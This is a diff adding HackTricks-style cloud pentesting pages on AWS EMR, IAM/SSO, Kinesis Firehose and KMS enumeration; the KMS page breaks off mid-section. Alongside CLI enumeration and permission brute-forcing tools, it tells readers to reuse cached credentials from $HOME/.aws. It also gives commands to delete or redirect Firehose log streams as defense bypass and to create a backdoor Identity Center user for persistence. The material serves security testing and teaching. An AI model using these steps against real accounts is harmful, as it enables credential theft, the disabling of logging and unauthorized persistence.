+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EMR
+
+AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark.
+
+Key characteristics include:
+
+* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features:
+  * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider.
+  * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop:
+    * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer.
+    * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm.
+* **Encryption in Transit**: Focuses on securing data during transfer. Options include:
+  * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:
+    * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket.
+    * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts.
+
+Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version:
+
+* **Hadoop**:
+  * Might reduce encrypted shuffle using TLS.
+  * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption.
+* **Presto** (EMR version 5.6.0+):
+  * Internal communication between Presto nodes is secured using SSL and TLS.
+* **Tez Shuffle Handler**:
+  * Utilizes TLS for encryption.
+* **Spark**:
+  * Employs TLS for the Akka protocol.
+  * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service.
+  * External shuffle service is secured with the Simple Authentication Security Layer.
+
+These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases.
+
+#### Enumeration
+
+```bash
+aws emr list-clusters
+aws emr describe-cluster --cluster-id <id>
+aws emr list-instances --cluster-id <id>
+aws emr list-instance-fleets --cluster-id <id>
+aws emr list-steps --cluster-id <id>
+aws emr list-notebook-executions
+aws emr list-security-configurations
+aws emr list-studios #Get studio URLs
+```
+
+#### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %}
+[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
new file mode 100644
index 0000000000..40a1e3b6db
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -0,0 +1,440 @@
+# AWS - IAM, Identity Center & SSO Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM
+
+You can find a **description of IAM** in:
+
+{% content-ref url="../aws-basic-information/" %}
+[aws-basic-information](../aws-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+Main permissions needed:
+
+* `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion`
+* `iam:ListRoles`
+* `iam:ListUsers`
+* `iam:ListGroups`
+* `iam:ListGroupsForUser`
+* `iam:ListAttachedUserPolicies`
+* `iam:ListAttachedRolePolicies`
+* `iam:ListAttachedGroupPolicies`
+* `iam:ListUserPolicies` and `iam:GetUserPolicy`
+* `iam:ListGroupPolicies` and `iam:GetGroupPolicy`
+* `iam:ListRolePolicies` and `iam:GetRolePolicy`
+
+```bash
+# All IAMs
+## Retrieves  information about all IAM users, groups, roles, and policies
+## in your Amazon Web Services account, including their relationships  to
+## one another. Use this operation to obtain a snapshot of the configura-
+## tion of IAM permissions (users, groups, roles, and  policies)  in  your
+## account.
+aws iam get-account-authorization-details
+
+# List users
+aws iam get-user #Get current user information
+aws iam list-users
+aws iam list-ssh-public-keys #User keys for CodeCommit
+aws iam get-ssh-public-key --user-name <username> --ssh-public-key-id <id> --encoding SSH #Get public key with metadata
+aws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services
+aws iam get-user --user-name <username> #Get metadata of user, included permissions boundaries
+aws iam list-access-keys #List created access keys
+## inline policies
+aws iam list-user-policies --user-name <username> #Get inline policies of the user
+aws iam get-user-policy --user-name <username> --policy-name <policyname> #Get inline policy details
+## attached policies
+aws iam list-attached-user-policies --user-name <username> #Get policies of user, it doesn't get inline policies
+
+# List groups
+aws iam list-groups #Get groups
+aws iam list-groups-for-user --user-name <username> #Get groups of a user
+aws iam get-group --group-name <name> #Get group name info
+## inline policies
+aws iam list-group-policies --group-name <username> #Get inline policies of the group
+aws iam get-group-policy --group-name <username> --policy-name <policyname> #Get an inline policy info
+## attached policies
+aws iam list-attached-group-policies --group-name <name> #Get policies of group, it doesn't get inline policies
+
+# List roles
+aws iam list-roles #Get roles
+aws iam get-role --role-name <role-name> #Get role
+## inline policies
+aws iam list-role-policies --role-name <name> #Get inline policies of a role
+aws iam get-role-policy --role-name <name> --policy-name <name> #Get inline policy details
+## attached policies
+aws iam list-attached-role-policies --role-name <role-name> #Get policies of role, it doesn't get inline policies
+
+# List policies
+aws iam list-policies [--only-attached] [--scope Local]
+aws iam list-policies-granting-service-access --arn <identity> --service-namespaces <svc> # Get list of policies that give access to the user to the service
+## Get policy content
+aws iam get-policy --policy-arn <policy_arn>
+aws iam list-policy-versions --policy-arn <arn>
+aws iam get-policy-version --policy-arn <arn:aws:iam::975426262029:policy/list_apigateways> --version-id <VERSION_X>
+
+# Enumerate providers
+aws iam list-saml-providers
+aws iam get-saml-provider --saml-provider-arn <ARN>
+aws iam list-open-id-connect-providers
+aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
+
+# Password Policy
+aws iam get-account-password-policy
+
+# MFA
+aws iam list-mfa-devices
+aws iam list-virtual-mfa-devices
+```
+
+### Permissions Brute Force
+
+If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them.
+
+#### bf-aws-permissions
+
+The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**.
+
+{% code overflow="wrap" %}
+```bash
+# Bruteforce permissions
+bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt
+```
+{% endcode %}
+
+#### bf-aws-perms-simulate
+
+The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`**
+
+```bash
+# Ask for permissions
+python3 aws_permissions_checker.py --profile <AWS_PROFILE> [--arn <USER_ARN>]
+```
+
+#### Perms2ManagedPolicies
+
+If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**.
+
+{% code overflow="wrap" %}
+```bash
+# Run example with my profile
+python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt
+```
+{% endcode %}
+
+{% hint style="warning" %}
+It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example.
+{% endhint %}
+
+#### Cloudtrail2IAM
+
+[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**.
+
+{% code overflow="wrap" %}
+```bash
+git clone https://github.com/carlospolop/Cloudtrail2IAM
+cd Cloudtrail2IAM
+pip install -r requirements.txt
+python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS]
+```
+{% endcode %}
+
+{% hint style="warning" %}
+If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who.
+{% endhint %}
+
+#### enumerate-iam
+
+To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**.
+
+(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that).
+
+{% hint style="warning" %}
+In my experience this tool is like the previous one but working worse and checking less permissions
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Install tool
+git clone git@github.com:andresriancho/enumerate-iam.git
+cd enumerate-iam/
+pip install -r requirements.txt
+
+# Download API endpoints
+cd enumerate_iam/
+git clone https://github.com/aws/aws-sdk-js.git
+python3 generate_bruteforce_tests.py
+rm -rf aws-sdk-js
+cd ..
+
+# Enumerate permissions
+python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION]
+```
+{% endcode %}
+
+#### weirdAAL
+
+You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests).
+
+```bash
+# Install
+git clone https://github.com/carnal0wnage/weirdAAL.git
+cd weirdAAL
+python3 -m venv weirdAAL
+source weirdAAL/bin/activate
+pip3 install -r requirements.txt
+
+# Create a .env file with aws credentials such as
+[default]
+aws_access_key_id = <insert key id>
+aws_secret_access_key = <insert secret key>
+
+# Setup DB
+python3 create_dbs.py
+
+# Invoke it
+python3 weirdAAL.py -m ec2_describe_instances -t ec2test # Just some ec2 tests
+python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions
+# You will see output such as:
+# [+] elbv2 Actions allowed are [+]
+# ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
+```
+
+#### Hardening Tools to BF permissions
+
+{% tabs %}
+{% tab title="CloudSploit" %}
+{% code overflow="wrap" %}
+```bash
+# Export env variables
+./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json
+
+# Filter results removing unknown
+jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json | jq 'map(select(.resource | contains("N/A") | not))' > /tmp/out-cloudsploit-filt.json
+
+# Get services by regions
+jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="SteamPipe" %}
+```bash
+# https://github.com/turbot/steampipe-mod-aws-insights
+steampipe check all --export=json
+
+# https://github.com/turbot/steampipe-mod-aws-perimeter
+# In this case you cannot output to JSON, so heck it in the dashboard
+steampipe dashboard
+```
+{% endtab %}
+{% endtabs %}
+
+#### \<YourTool>
+
+Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR!
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md" %}
+[aws-iam-and-sts-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privilege Escalation
+
+In the following page you can check how to **abuse IAM permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-iam-privesc.md" %}
+[aws-iam-privesc.md](../aws-privilege-escalation/aws-iam-privesc.md)
+{% endcontent-ref %}
+
+### IAM Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-iam-post-exploitation.md" %}
+[aws-iam-post-exploitation.md](../aws-post-exploitation/aws-iam-post-exploitation.md)
+{% endcontent-ref %}
+
+### IAM Persistence
+
+{% content-ref url="../aws-persistence/aws-iam-persistence.md" %}
+[aws-iam-persistence.md](../aws-persistence/aws-iam-persistence.md)
+{% endcontent-ref %}
+
+## IAM Identity Center
+
+You can find a **description of IAM Identity Center** in:
+
+{% content-ref url="../aws-basic-information/" %}
+[aws-basic-information](../aws-basic-information/)
+{% endcontent-ref %}
+
+### Connect via SSO with CLI
+
+```bash
+# Connect with sso via CLI aws configure sso
+aws configure sso
+
+[profile profile_name]
+sso_start_url = https://subdomain.awsapps.com/start/
+sso_account_id = <account_numbre>
+sso_role_name = AdministratorAccess
+sso_region = us-east-1
+```
+
+### Enumeration
+
+The main elements of the Identity Center are:
+
+* Users and groups
+* Permission Sets: Have policies attached
+* AWS Accounts
+
+Then, relationships are created so users/groups have Permission Sets over AWS Account.
+
+{% hint style="info" %}
+Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there).
+{% endhint %}
+
+```bash
+# Check if IAM Identity Center is used
+aws sso-admin list-instances
+
+# Get Permissions sets. These are the policies that can be assigned
+aws sso-admin list-permission-sets --instance-arn <instance-arn>
+aws sso-admin describe-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+
+## Get managed policies of a permission set
+aws sso-admin list-managed-policies-in-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+## Get inline policies of a permission set
+aws sso-admin get-inline-policy-for-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+## Get customer managed policies of a permission set
+aws sso-admin list-customer-managed-policy-references-in-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+## Get boundaries of a permission set
+aws sso-admin get-permissions-boundary-for-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+
+## List accounts a permission set is affecting
+aws sso-admin list-accounts-for-provisioned-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
+## List principals given a permission set in an account
+aws sso-admin list-account-assignments --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --account-id <account_id>
+
+# Get permissions sets affecting an account
+aws sso-admin list-permission-sets-provisioned-to-account --instance-arn <instance-arn> --account-id <account_id>
+
+# List users & groups from the identity store
+aws identitystore list-users --identity-store-id <store-id>
+aws identitystore list-groups --identity-store-id <store-id>
+## Get members of groups
+aws identitystore list-group-memberships --identity-store-id <store-id> --group-id <group-id>
+## Get memberships or a user or a group
+aws identitystore list-group-memberships-for-member --identity-store-id <store-id> --member-id <member-id>
+```
+
+### Local Enumeration
+
+It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example:
+
+```ini
+[default]
+region = us-west-2
+output = json
+
+[profile my-sso-profile]
+sso_start_url = https://my-sso-portal.awsapps.com/start
+sso_region = us-west-2
+sso_account_id = 123456789012
+sso_role_name = MySSORole
+region = us-west-2
+output = json
+
+[profile dependent-profile]
+role_arn = arn:aws:iam::<acc-id>:role/ReadOnlyRole
+source_profile = Hacktricks-Admin
+```
+
+This configuration can be used with the commands:
+
+```bash
+# Login in ms-sso-profile
+aws sso login --profile my-sso-profile
+# Use dependent-profile
+aws s3 ls --profile dependent-profile
+```
+
+When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**.
+
+Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example:
+
+```ini
+[profile crossaccountrole]
+role_arn = arn:aws:iam::234567890123:role/SomeRole
+source_profile = default
+mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
+external_id = 123456
+```
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md" %}
+[aws-identity-center-and-sso-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privilege Escalation
+
+{% content-ref url="../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md" %}
+[aws-sso-and-identitystore-privesc.md](../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md" %}
+[aws-sso-and-identitystore-post-exploitation.md](../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+#### Create a user an assign permissions to it
+
+{% code overflow="wrap" %}
+```bash
+# Create user identitystore:CreateUser
+aws identitystore create-user --identity-store-id <store-id> --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc
+## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password
+```
+{% endcode %}
+
+* Create a group and assign it permissions and set on it a controlled user
+* Give extra permissions to a controlled user or group
+*   By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.
+
+    However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
new file mode 100644
index 0000000000..34909d6259
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
@@ -0,0 +1,77 @@
+# AWS - Kinesis Data Firehose Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Kinesis Data Firehose
+
+Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints.
+
+The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases.
+
+### Enumeration
+
+```bash
+# Get delivery streams
+aws firehose list-delivery-streams
+
+# Get stream info
+aws firehose describe-delivery-stream --delivery-stream-name <name>
+## Get roles
+aws firehose describe-delivery-stream --delivery-stream-name <name> | grep -i RoleARN
+```
+
+## Post-exploitation / Defense Bypass
+
+In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly.
+
+### firehose:DeleteDeliveryStream
+
+```
+aws firehose delete-delivery-stream --delivery-stream-name <value> --allow-force-delete
+```
+
+### firehose:UpdateDestination
+
+```
+aws firehose update-destination --delivery-stream-name <value> --current-delivery-stream-version-id <value> --destination-id <value>
+```
+
+### firehose:PutRecord | firehose:PutRecordBatch
+
+```
+aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}'
+
+aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json
+```
+
+## References
+
+* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
new file mode 100644
index 0000000000..f1b5c3bdf4
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
@@ -0,0 +1,183 @@
+# AWS - KMS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS - Key Management Service
+
+AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys.
+
+KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.
+
+KMS is a **region specific service**.
+
+**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used.
+
+**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
+
+A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
+
+There are 2 types of master keys:
+
+* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
+* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
+
+**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
+
+### Key Policies
+
+These defines **who can use and access a key in KMS**.
+
+By **default:**
+
+*   It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM.
+
+    Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one.
+
+    * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work.
+*   It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy.
+
+    **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective.
+* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted.
+
+**Default policy** example:
+
+```json
+{
+  "Sid": "Enable IAM policies",
+  "Effect": "Allow",
+  "Principal": {
+    "AWS": "arn:aws:iam::111122223333:root"
+   },
+  "Action": "kms:*",
+  "Resource": "*"
+}
+```
+
+{% hint style="warning" %}
+If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**.
+{% endhint %}
+
+<details>
+
+<summary>Policy Details</summary>
+
+Properties of a policy:
+
+* JSON based document
+* Resource --> Affected resources (can be "\*")
+* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
+* Effect --> Allow/Deny
+* Principal --> arn affected
+* Conditions (optional) --> Condition to give the permissions
+
+Grants:
+
